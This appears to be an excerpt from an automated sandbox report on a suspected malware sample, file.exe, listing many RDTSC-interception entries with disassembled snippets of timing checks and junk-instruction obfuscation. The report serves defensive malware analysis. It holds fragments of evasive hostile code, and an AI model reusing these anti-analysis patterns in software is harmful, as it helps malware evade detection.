Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C2D1DC second address: C2D296 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 mov dword ptr [esp], eax 0x00000009 mov edi, dword ptr [ebp+122D3843h] 0x0000000f jmp 00007F927881D80Eh 0x00000014 push dword ptr fs:[00000000h] 0x0000001b mov bh, ah 0x0000001d mov dword ptr fs:[00000000h], esp 0x00000024 push 00000000h 0x00000026 push ebx 0x00000027 call 00007F927881D808h 0x0000002c pop ebx 0x0000002d mov dword ptr [esp+04h], ebx 0x00000031 add dword ptr [esp+04h], 00000014h 0x00000039 inc ebx 0x0000003a push ebx 0x0000003b ret 0x0000003c pop ebx 0x0000003d ret 0x0000003e mov dword ptr [ebp+12464547h], esi 0x00000044 mov dword ptr [ebp+12464547h], ecx 0x0000004a mov eax, dword ptr [ebp+122D13CDh] 0x00000050 call 00007F927881D813h 0x00000055 mov ebx, edi 0x00000057 pop edi 0x00000058 sub dword ptr [ebp+122D2B58h], ebx 0x0000005e push FFFFFFFFh 0x00000060 call 00007F927881D812h 0x00000065 xor dword ptr [ebp+122D2408h], edi 0x0000006b pop ebx 0x0000006c nop 0x0000006d jne 00007F927881D80Eh 0x00000073 push eax 0x00000074 push eax 0x00000075 push edx 0x00000076 jmp 00007F927881D816h 0x0000007b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C2D296 second address: C2D29C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C3287E second address: C32882 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C32882 second address: C328AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jmp 00007F9278BE2838h 0x0000000c pop esi 0x0000000d popad 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push edi 0x00000013 pop edi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C328AB second address: C328B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C34B6F second address: C34B82 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F9278BE2826h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b ja 00007F9278BE2826h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C302C7 second address: C302CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C329BC second address: C329C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C329C0 second address: C32AA3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F927881D818h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push esi 0x00000010 call 00007F927881D808h 0x00000015 pop esi 0x00000016 mov dword ptr [esp+04h], esi 0x0000001a add dword ptr [esp+04h], 0000001Ch 0x00000022 inc esi 0x00000023 push esi 0x00000024 ret 0x00000025 pop esi 0x00000026 ret 0x00000027 and ebx, dword ptr [ebp+122D18E4h] 0x0000002d pushad 0x0000002e push eax 0x0000002f mov dword ptr [ebp+122D2967h], edi 0x00000035 pop ecx 0x00000036 popad 0x00000037 jmp 00007F927881D815h 0x0000003c push dword ptr fs:[00000000h] 0x00000043 mov dword ptr [ebp+122D2057h], ebx 0x00000049 mov dword ptr fs:[00000000h], esp 0x00000050 ja 00007F927881D81Dh 0x00000056 mov eax, dword ptr [ebp+122D0335h] 0x0000005c call 00007F927881D811h 0x00000061 mov dword ptr [ebp+122D2337h], edx 0x00000067 pop ebx 0x00000068 push FFFFFFFFh 0x0000006a mov bl, 87h 0x0000006c jmp 00007F927881D80Ch 0x00000071 nop 0x00000072 jmp 00007F927881D80Fh 0x00000077 push eax 0x00000078 js 00007F927881D814h 0x0000007e push eax 0x0000007f push edx 0x00000080 push eax 0x00000081 push edx 0x00000082 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C32AA3 second address: C32AA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C3BDB6 second address: C3BDBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C3BDBA second address: C3BDBE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C3BDBE second address: C3BDC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C3BDC8 second address: C3BDCC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C3B569 second address: C3B56F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C41A17 second address: C41A1C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C41ABB second address: C41AC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C41AC1 second address: C41AC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD71C6 second address: BD71CE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4627E second address: C46286 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C46286 second address: C4628C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4628C second address: C4629D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jnp 00007F9278BE2826h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4629D second address: C462A7 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F927881D806h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C462A7 second address: C462B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C467DC second address: C467E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C467E3 second address: C467EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C467EB second address: C46802 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 pushad 0x00000007 je 00007F927881D80Ah 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 push edi 0x00000012 pop edi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C46C94 second address: C46C98 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C46C98 second address: C46CB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F927881D806h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F927881D80Eh 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C46CB5 second address: C46CBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C46CBB second address: C46D09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 pushad 0x00000009 pushad 0x0000000a jmp 00007F927881D814h 0x0000000f jmp 00007F927881D80Dh 0x00000014 jmp 00007F927881D810h 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F927881D80Eh 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C47018 second address: C4702C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9278BE2830h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4702C second address: C47036 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C47036 second address: C4703A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4703A second address: C4703E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C47177 second address: C4717B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4717B second address: C47186 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C47186 second address: C47198 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F9278BE2826h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d popad 0x0000000e pushad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C47479 second address: C4747D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4BB7F second address: C4BB85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4BCF4 second address: C4BCFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4BCFA second address: C4BCFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4BCFE second address: C4BD07 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4BE83 second address: C4BE9E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9278BE2835h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4C018 second address: C4C027 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop esi 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4C027 second address: C4C04A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F9278BE2826h 0x0000000a popad 0x0000000b pushad 0x0000000c push edi 0x0000000d pop edi 0x0000000e js 00007F9278BE2826h 0x00000014 popad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 jng 00007F9278BE2826h 0x0000001f push edx 0x00000020 pop edx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4C04A second address: C4C04F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4C04F second address: C4C054 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4C5EB second address: C4C5EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4C5EF second address: C4C5F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4C5F3 second address: C4C5F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4C5F9 second address: C4C62E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F9278BE2834h 0x00000008 jmp 00007F9278BE282Dh 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 push esi 0x00000014 jng 00007F9278BE2826h 0x0000001a pop esi 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4C976 second address: C4C980 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F927881D812h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4C980 second address: C4C986 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BFC42F second address: BFC43A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F927881D806h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BFC43A second address: BFC43F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD39C5 second address: BD39C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD39C9 second address: BD39E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F9278BE282Fh 0x0000000c jnl 00007F9278BE2826h 0x00000012 push esi 0x00000013 pop esi 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD39E8 second address: BD3A00 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F927881D813h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD3A00 second address: BD3A0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD3A0C second address: BD3A10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4B711 second address: C4B715 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4B715 second address: C4B71F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C518C6 second address: C518D0 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F9278BE2826h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C51A28 second address: C51A2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C51A2E second address: C51A43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F9278BE2826h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d js 00007F9278BE2826h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C51A43 second address: C51A49 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C51E57 second address: C51E5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C51E5B second address: C51E6F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F927881D812h 0x0000000c jp 00007F927881D806h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C522A0 second address: C522A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C52694 second address: C526AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F927881D806h 0x0000000a jmp 00007F927881D811h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C526AF second address: C526C3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jng 00007F9278BE2826h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f pushad 0x00000010 popad 0x00000011 push edi 0x00000012 pop edi 0x00000013 pop edi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C526C3 second address: C526C8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C56EE0 second address: C56EEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 je 00007F9278BE2826h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C55D1A second address: C55D1F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C55D1F second address: C55D25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C55D25 second address: C55D2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C12C95 second address: C12C9B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C12C9B second address: C12CBB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push ecx 0x0000000a xor dl, FFFFFF9Dh 0x0000000d pop edi 0x0000000e lea eax, dword ptr [ebp+124779DEh] 0x00000014 mov cl, bl 0x00000016 nop 0x00000017 jns 00007F927881D814h 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C12CBB second address: C12CC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C12DDF second address: C12DE4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C132CA second address: C132EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9278BE2836h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push esi 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C13469 second address: C1346E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1362B second address: C1363F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9278BE2830h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1363F second address: C13644 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C13E7A second address: C13E80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C13E80 second address: C13E84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C55FFD second address: C56001 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C13CCE second address: C13CD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C56136 second address: C56145 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnl 00007F9278BE2826h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C56145 second address: C56149 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C56298 second address: C562B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9278BE2836h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5640A second address: C56410 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C56410 second address: C56414 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C56414 second address: C5641A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6202A second address: C62034 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F9278BE2826h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C62034 second address: C62041 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C61BD8 second address: C61BDF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C61BDF second address: C61BF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jo 00007F927881D806h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
